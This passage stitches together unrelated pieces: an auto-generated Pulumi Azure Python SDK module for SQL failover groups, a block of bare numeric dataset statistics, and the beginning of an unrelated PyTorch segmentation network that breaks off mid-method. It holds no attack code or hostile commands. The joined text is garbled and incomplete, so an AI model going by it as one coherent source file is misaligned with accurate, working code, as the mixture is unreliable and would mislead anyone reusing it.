def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _FailoverGroupState:
def __init__(__self__, *,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]] = None,
read_write_endpoint_failover_policy: Optional[pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering FailoverGroup resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] databases: A list of database ids to add to the failover group
:param pulumi.Input[str] location: the location of the failover group.
:param pulumi.Input[str] name: The name of the failover group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]] partner_servers: A list of secondary servers as documented below
:param pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs'] read_write_endpoint_failover_policy: A read/write policy as documented below
:param pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs'] readonly_endpoint_failover_policy: a read-only policy as documented below
:param pulumi.Input[str] resource_group_name: The name of the resource group containing the SQL server
:param pulumi.Input[str] role: local replication role of the failover group instance.
:param pulumi.Input[str] server_name: The name of the primary SQL server. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if databases is not None:
pulumi.set(__self__, "databases", databases)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if partner_servers is not None:
pulumi.set(__self__, "partner_servers", partner_servers)
if read_write_endpoint_failover_policy is not None:
pulumi.set(__self__, "read_write_endpoint_failover_policy", read_write_endpoint_failover_policy)
if readonly_endpoint_failover_policy is not None:
pulumi.set(__self__, "readonly_endpoint_failover_policy", readonly_endpoint_failover_policy)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if role is not None:
pulumi.set(__self__, "role", role)
if server_name is not None:
pulumi.set(__self__, "server_name", server_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of database ids to add to the failover group
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
the location of the failover group.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the failover group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="partnerServers")
def partner_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]]:
"""
A list of secondary servers as documented below
"""
return pulumi.get(self, "partner_servers")
@partner_servers.setter
def partner_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FailoverGroupPartnerServerArgs']]]]):
pulumi.set(self, "partner_servers", value)
@property
@pulumi.getter(name="readWriteEndpointFailoverPolicy")
def read_write_endpoint_failover_policy(self) -> Optional[pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]:
"""
A read/write policy as documented below
"""
return pulumi.get(self, "read_write_endpoint_failover_policy")
@read_write_endpoint_failover_policy.setter
def read_write_endpoint_failover_policy(self, value: Optional[pulumi.Input['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]):
pulumi.set(self, "read_write_endpoint_failover_policy", value)
@property
@pulumi.getter(name="readonlyEndpointFailoverPolicy")
def readonly_endpoint_failover_policy(self) -> Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]:
"""
a read-only policy as documented below
"""
return pulumi.get(self, "readonly_endpoint_failover_policy")
@readonly_endpoint_failover_policy.setter
def readonly_endpoint_failover_policy(self, value: Optional[pulumi.Input['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]):
pulumi.set(self, "readonly_endpoint_failover_policy", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group containing the SQL server
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
local replication role of the failover group instance.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the primary SQL server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class FailoverGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]]] = None,
read_write_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Create a failover group of databases on a collection of Azure SQL servers.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
primary = azure.sql.SqlServer("primary",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
version="12.0",
administrator_login="sqladmin",
administrator_login_password="pa$$w0rd")
secondary = azure.sql.SqlServer("secondary",
resource_group_name=example_resource_group.name,
location="northeurope",
version="12.0",
administrator_login="sqladmin",
administrator_login_password="pa$$w0rd")
db1 = azure.sql.Database("db1",
resource_group_name=primary.resource_group_name,
location=primary.location,
server_name=primary.name)
example_failover_group = azure.sql.FailoverGroup("exampleFailoverGroup",
resource_group_name=primary.resource_group_name,
server_name=primary.name,
databases=[db1.id],
partner_servers=[azure.sql.FailoverGroupPartnerServerArgs(
id=secondary.id,
)],
read_write_endpoint_failover_policy=azure.sql.FailoverGroupReadWriteEndpointFailoverPolicyArgs(
mode="Automatic",
grace_minutes=60,
))
```
## Import
SQL Failover Groups can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:sql/failoverGroup:FailoverGroup example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myresourcegroup/providers/Microsoft.Sql/servers/myserver/failovergroups/group1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] databases: A list of database ids to add to the failover group
:param pulumi.Input[str] name: The name of the failover group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]] partner_servers: A list of secondary servers as documented below
:param pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']] read_write_endpoint_failover_policy: A read/write policy as documented below
:param pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']] readonly_endpoint_failover_policy: a read-only policy as documented below
:param pulumi.Input[str] resource_group_name: The name of the resource group containing the SQL server
:param pulumi.Input[str] server_name: The name of the primary SQL server. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FailoverGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a failover group of databases on a collection of Azure SQL servers.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
primary = azure.sql.SqlServer("primary",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
version="12.0",
administrator_login="sqladmin",
administrator_login_password="pa$$w0rd")
secondary = azure.sql.SqlServer("secondary",
resource_group_name=example_resource_group.name,
location="northeurope",
version="12.0",
administrator_login="sqladmin",
administrator_login_password="pa$$w0rd")
db1 = azure.sql.Database("db1",
resource_group_name=primary.resource_group_name,
location=primary.location,
server_name=primary.name)
example_failover_group = azure.sql.FailoverGroup("exampleFailoverGroup",
resource_group_name=primary.resource_group_name,
server_name=primary.name,
databases=[db1.id],
partner_servers=[azure.sql.FailoverGroupPartnerServerArgs(
id=secondary.id,
)],
read_write_endpoint_failover_policy=azure.sql.FailoverGroupReadWriteEndpointFailoverPolicyArgs(
mode="Automatic",
grace_minutes=60,
))
```
## Import
SQL Failover Groups can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:sql/failoverGroup:FailoverGroup example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myresourcegroup/providers/Microsoft.Sql/servers/myserver/failovergroups/group1
```
:param str resource_name: The name of the resource.
:param FailoverGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FailoverGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]]] = None,
read_write_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FailoverGroupArgs.__new__(FailoverGroupArgs)
__props__.__dict__["databases"] = databases
__props__.__dict__["name"] = name
if partner_servers is None and not opts.urn:
raise TypeError("Missing required property 'partner_servers'")
__props__.__dict__["partner_servers"] = partner_servers
if read_write_endpoint_failover_policy is None and not opts.urn:
raise TypeError("Missing required property 'read_write_endpoint_failover_policy'")
__props__.__dict__["read_write_endpoint_failover_policy"] = read_write_endpoint_failover_policy
__props__.__dict__["readonly_endpoint_failover_policy"] = readonly_endpoint_failover_policy
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if server_name is None and not opts.urn:
raise TypeError("Missing required property 'server_name'")
__props__.__dict__["server_name"] = server_name
__props__.__dict__["tags"] = tags
__props__.__dict__["location"] = None
__props__.__dict__["role"] = None
super(FailoverGroup, __self__).__init__(
'azure:sql/failoverGroup:FailoverGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partner_servers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]]] = None,
read_write_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']]] = None,
readonly_endpoint_failover_policy: Optional[pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'FailoverGroup':
"""
Get an existing FailoverGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] databases: A list of database ids to add to the failover group
:param pulumi.Input[str] location: the location of the failover group.
:param pulumi.Input[str] name: The name of the failover group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FailoverGroupPartnerServerArgs']]]] partner_servers: A list of secondary servers as documented below
:param pulumi.Input[pulumi.InputType['FailoverGroupReadWriteEndpointFailoverPolicyArgs']] read_write_endpoint_failover_policy: A read/write policy as documented below
:param pulumi.Input[pulumi.InputType['FailoverGroupReadonlyEndpointFailoverPolicyArgs']] readonly_endpoint_failover_policy: a read-only policy as documented below
:param pulumi.Input[str] resource_group_name: The name of the resource group containing the SQL server
:param pulumi.Input[str] role: local replication role of the failover group instance.
:param pulumi.Input[str] server_name: The name of the primary SQL server. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
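        A minimal sketch of looking up an existing failover group (the resource
        name and id below are hypothetical placeholders):
        ```python
        import pulumi_azure as azure
        example = azure.sql.FailoverGroup.get("existingFailoverGroup",
            id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myresourcegroup/providers/Microsoft.Sql/servers/myserver/failovergroups/group1")
        ```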
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _FailoverGroupState.__new__(_FailoverGroupState)
__props__.__dict__["databases"] = databases
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["partner_servers"] = partner_servers
__props__.__dict__["read_write_endpoint_failover_policy"] = read_write_endpoint_failover_policy
__props__.__dict__["readonly_endpoint_failover_policy"] = readonly_endpoint_failover_policy
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["role"] = role
__props__.__dict__["server_name"] = server_name
__props__.__dict__["tags"] = tags
return FailoverGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of database ids to add to the failover group
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
the location of the failover group.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the failover group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="partnerServers")
def partner_servers(self) -> pulumi.Output[Sequence['outputs.FailoverGroupPartnerServer']]:
"""
A list of secondary servers as documented below
"""
return pulumi.get(self, "partner_servers")
@property
@pulumi.getter(name="readWriteEndpointFailoverPolicy")
def read_write_endpoint_failover_policy(self) -> pulumi.Output['outputs.FailoverGroupReadWriteEndpointFailoverPolicy']:
"""
A read/write policy as documented below
"""
return pulumi.get(self, "read_write_endpoint_failover_policy")
@property
@pulumi.getter(name="readonlyEndpointFailoverPolicy")
def readonly_endpoint_failover_policy(self) -> pulumi.Output['outputs.FailoverGroupReadonlyEndpointFailoverPolicy']:
"""
a read-only policy as documented below
"""
return pulumi.get(self, "readonly_endpoint_failover_policy")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group containing the SQL server
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
local replication role of the failover group instance.
"""
return pulumi.get(self, "role")
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Output[str]:
"""
The name of the primary SQL server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 48.553429
| 216
| 0.680452
| 3,355
| 30,443
| 5.935618
| 0.063785
| 0.087828
| 0.055539
| 0.042684
| 0.891182
| 0.88149
| 0.856182
| 0.843929
| 0.832932
| 0.817666
| 0
| 0.003932
| 0.223105
| 30,443
| 626
| 217
| 48.63099
| 0.838062
| 0.332162
| 0
| 0.68997
| 1
| 0
| 0.17414
| 0.115699
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161094
| false
| 0.00304
| 0.021277
| 0
| 0.279635
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d200ca2e203fa3f3e32cd70794d14a33d7e2d04b
| 3,710
|
py
|
Python
|
New folder/Assignment4.py
|
piyushparastiwari/python-project
|
5dba0ef4e77f1d2528f510327de4224b60b1d4ba
|
[
"Apache-2.0"
] | null | null | null |
New folder/Assignment4.py
|
piyushparastiwari/python-project
|
5dba0ef4e77f1d2528f510327de4224b60b1d4ba
|
[
"Apache-2.0"
] | null | null | null |
New folder/Assignment4.py
|
piyushparastiwari/python-project
|
5dba0ef4e77f1d2528f510327de4224b60b1d4ba
|
[
"Apache-2.0"
] | null | null | null |
Python 3.6.5 (v3.6.5:f59c0932b4, Mar 28 2018, 16:07:46) [MSC v.1900 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> x=6
>>> if x%2==0:
print("Even no.")
else:
print("Odd no.")
Even no.
>>> age=30
>>> gender='Male'
>>> sal=60000
>>> if age>30:
elif gender=='Male':
SyntaxError: expected an indented block
>>> if age>30:
if gender=='Male':
if sal>50000:
print("Person is eligible for policy")
else:
print("Not eligible")
Not eligible
>>> marks=80
>>> if marks>=90:
print("A+")
elif marks>=80:
print("A")
elif marks>=70:
print("B")
elif marks>=60:
print("C")
elif marks>=50:
print("D")
elif marks>=40:
print("E")
else:
print("F")
A
>>> year=2016
>>> if year%4==0:
if year%100==0:
print("Leap year")
else:
print("Not leap year")
>>> year
2016
>>> if year%4==0:
print("Leap year")
else:
print("Not leap year")
Leap year
>>> l=10
>>> b=5
>>> if age>25:
if gender=='Male':
if sal>50000:
print("Person is eligible for policy")
else:
print("Not eligible")
Person is eligible for policy
>>> l=10
>>> b=5
>>> if l==b
SyntaxError: invalid syntax
>>> if l==b:
print("It is a square")
else:
print("It is a rectangle")
It is a rectangle
>>> age1=20
>>> age2=10
>>> age3=30
>>> if age1>age2:
if age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1:
SyntaxError: invalid syntax
>>> if age1>age2:
if age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1:
if age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1:
print("age3 is oldest")
else:
print("age3 is youngest")
age1 is youngest
>>> if age1>age2 && age1>age3:
SyntaxError: invalid syntax
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
SyntaxError: invalid syntax
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2
print("age3 is oldest")
else:
print("age3 is youngest")
SyntaxError: unindent does not match any outer indentation level
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2
print("age3 is oldest")
else:
print("age3 is youngest")
SyntaxError: unindent does not match any outer indentation level
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2:
print("age3 is oldest")
else:
print("age3 is youngest")
SyntaxError: unindent does not match any outer indentation level
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2:
print("age3 is oldest")
else:
print("age3 is youngest")
SyntaxError: unexpected indent
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2:
print("age3 is oldest")
else:
print("age3 is youngest")
age1 is youngest
age2 is younger
age3 is oldest
>>>
| 19.123711
| 93
| 0.618059
| 567
| 3,710
| 4.044092
| 0.17284
| 0.10205
| 0.104666
| 0.140864
| 0.761884
| 0.744876
| 0.72089
| 0.72089
| 0.72089
| 0.691234
| 0
| 0.081453
| 0.23558
| 3,710
| 193
| 94
| 19.222798
| 0.72708
| 0
| 0
| 0.700599
| 0
| 0
| 0.227182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.347305
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d26647baab13efb4ccb6a4cc5be8f666b6473a68
| 1,181
|
py
|
Python
|
app/main/views.py
|
Nabuuso/News-Catchup
|
ec30f213ec377130f500a4366b6ca30ae68e658f
|
[
"MIT"
] | null | null | null |
app/main/views.py
|
Nabuuso/News-Catchup
|
ec30f213ec377130f500a4366b6ca30ae68e658f
|
[
"MIT"
] | null | null | null |
app/main/views.py
|
Nabuuso/News-Catchup
|
ec30f213ec377130f500a4366b6ca30ae68e658f
|
[
"MIT"
] | null | null | null |
from flask import render_template
from . import main
from ..requests import get_sources
# #@main.route('/')
# def index1():
# '''
# View root page function that returns the index page and its data
# '''
# # Getting popular movie
# business_source = get_sources()
# # print(business_source)
# title = 'Home - Welcome to The best Movie Review Website Online'
# return render_template('index.html',business_sources = business_source)
# #@main.route('/articles/<int:article_id>')
# def articles(article_id):
# '''
# View news page function that returns the news details page and its data
# '''
# return render_template('articles.html',id = article_id)
@main.route('/')
def index():
    '''
    View root page function that returns the index page and its data
    '''
    business_source = get_sources()
    # print(business_source)
    title = 'Home - Welcome to The best Movie Review Website Online'
    return render_template('index.html', business_sources=business_source)
@main.route('/articles/<int:article_id>')
def articles(article_id):
'''
View news page function that returns the news details page and its data
'''
    return render_template('articles.html', id=article_id)
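# A minimal sketch of how this blueprint is typically wired up (assuming an
# application factory in app/__init__.py; the names below are assumptions, not
# taken from this file):
#   from flask import Flask
#   from .main import main as main_blueprint
#   def create_app():
#       app = Flask(__name__)
#       app.register_blueprint(main_blueprint)
#       return app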
| 25.673913
| 77
| 0.679086
| 150
| 1,181
| 5.2
| 0.3
| 0.107692
| 0.102564
| 0.088462
| 0.805128
| 0.771795
| 0.771795
| 0.771795
| 0.771795
| 0.771795
| 0
| 0.001066
| 0.205758
| 1,181
| 45
| 78
| 26.244444
| 0.83049
| 0.564776
| 0
| 0
| 0
| 0
| 0.219409
| 0.054852
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.272727
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d26c97bf9130a2e759ad269e4407c36c387349b9
| 9,786
|
py
|
Python
|
Client_4/model_utils.py
|
karavik18/Federated_Learning_for_Missing_MRI_Sequence
|
42924f8475f354e6b429d05867f99530aa485b96
|
[
"Apache-2.0"
] | 1
|
2021-08-25T13:36:26.000Z
|
2021-08-25T13:36:26.000Z
|
Client_4/model_utils.py
|
karavik18/Federated_Learning_for_Reconstruction_of_Missing_MR_Sequence
|
42924f8475f354e6b429d05867f99530aa485b96
|
[
"Apache-2.0"
] | null | null | null |
Client_4/model_utils.py
|
karavik18/Federated_Learning_for_Reconstruction_of_Missing_MR_Sequence
|
42924f8475f354e6b429d05867f99530aa485b96
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
class PreNet(nn.Module):
def __init__(self):
super(PreNet,self).__init__()
self.conv1 = nn.Conv2d(4, 8, 3, padding = 1)
self.act1 = nn.LeakyReLU(0.2, inplace=False)
self.conv2 = nn.Conv2d(8, 16, 3, padding = 1)
self.act2 = nn.LeakyReLU(0.2, inplace=False)
def forward(self, labels):
conv1 = self.act1(self.conv1(labels))
conv2 = self.act2(self.conv2(conv1))
return conv2
class SUMNet_v1(nn.Module):
def __init__(self):
        super(SUMNet_v1, self).__init__()
self.conv1 = nn.Conv2d(4, 64, 3, padding=(1,1))
self.bn1 = nn.BatchNorm2d(64)
        self.pool1 = nn.MaxPool2d(2, 2, return_indices = True)  # indices are needed by MaxUnpool2d in forward
self.conv2 = nn.Conv2d(64, 128, 3, padding=(1,1))
self.bn2 = nn.BatchNorm2d(128)
        self.pool2 = nn.MaxPool2d(2, 2, return_indices = True)
self.conv3a = nn.Conv2d(128, 256, 3, padding=(1,1))
self.bn3 = nn.BatchNorm2d(256)
self.conv3b = nn.Conv2d(256, 256, 3, padding=(1,1))
self.bn4 = nn.BatchNorm2d(256)
        self.pool3 = nn.MaxPool2d(2, 2, return_indices = True)
self.conv4a = nn.Conv2d(256, 512, 3, padding=(1,1))
self.bn5 = nn.BatchNorm2d(512)
self.conv4b = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn6 = nn.BatchNorm2d(512)
        self.pool4 = nn.MaxPool2d(2, 2, return_indices = True)
self.conv5a = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn7 = nn.BatchNorm2d(512)
self.conv5b = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn8 = nn.BatchNorm2d(512)
        self.pool5 = nn.MaxPool2d(2, 2, return_indices = True)
self.unpool5 = nn.MaxUnpool2d(2, 2)
self.donv5b = nn.Conv2d(1024, 512, 3, padding = 1)
self.donv5a = nn.Conv2d(512, 512, 3, padding = 1)
self.unpool4 = nn.MaxUnpool2d(2, 2)
self.donv4b = nn.Conv2d(1024, 512, 3, padding = 1)
self.donv4a = nn.Conv2d(512, 256, 3, padding = 1)
self.unpool3 = nn.MaxUnpool2d(2, 2)
self.donv3b = nn.Conv2d(512, 256, 3, padding = 1)
self.donv3a = nn.Conv2d(256,128, 3, padding = 1)
self.unpool2 = nn.MaxUnpool2d(2, 2)
self.donv2 = nn.Conv2d(256, 64, 3, padding = 1)
self.unpool1 = nn.MaxUnpool2d(2, 2)
self.donv1 = nn.Conv2d(128, 32, 3, padding = 1)
self.output = nn.Conv2d(32, 4, 1)
def forward(self, x):
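        # VGG-style encoder with five 2x2 max-poolings, mirrored by a decoder that
        # max-unpools with the stored indices and concatenates the matching encoder
        # feature map before the decode convolutions (U-Net-like skip connections).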
conv1 = F.relu(self.bn1(self.conv1(x)), inplace = True)
pool1, idxs1 = self.pool1(conv1)
conv2 = F.relu(self.bn2(self.conv2(pool1)), inplace = True)
pool2, idxs2 = self.pool2(conv2)
conv3a = F.relu(self.bn3(self.conv3a(pool2)), inplace = True)
conv3b = F.relu(self.bn4(self.conv3b(conv3a)), inplace = True)
pool3, idxs3 = self.pool3(conv3b)
conv4a = F.relu(self.bn5(self.conv4a(pool3)), inplace = True)
conv4b = F.relu(self.bn6(self.conv4b(conv4a)), inplace = True)
pool4, idxs4 = self.pool4(conv4b)
conv5a = F.relu(self.bn7(self.conv5a(pool4)), inplace = True)
conv5b = F.relu(self.bn8(self.conv5b(conv5a)), inplace = True)
pool5, idxs5 = self.pool5(conv5b)
unpool5 = torch.cat([self.unpool5(pool5, idxs5), conv5b], 1)
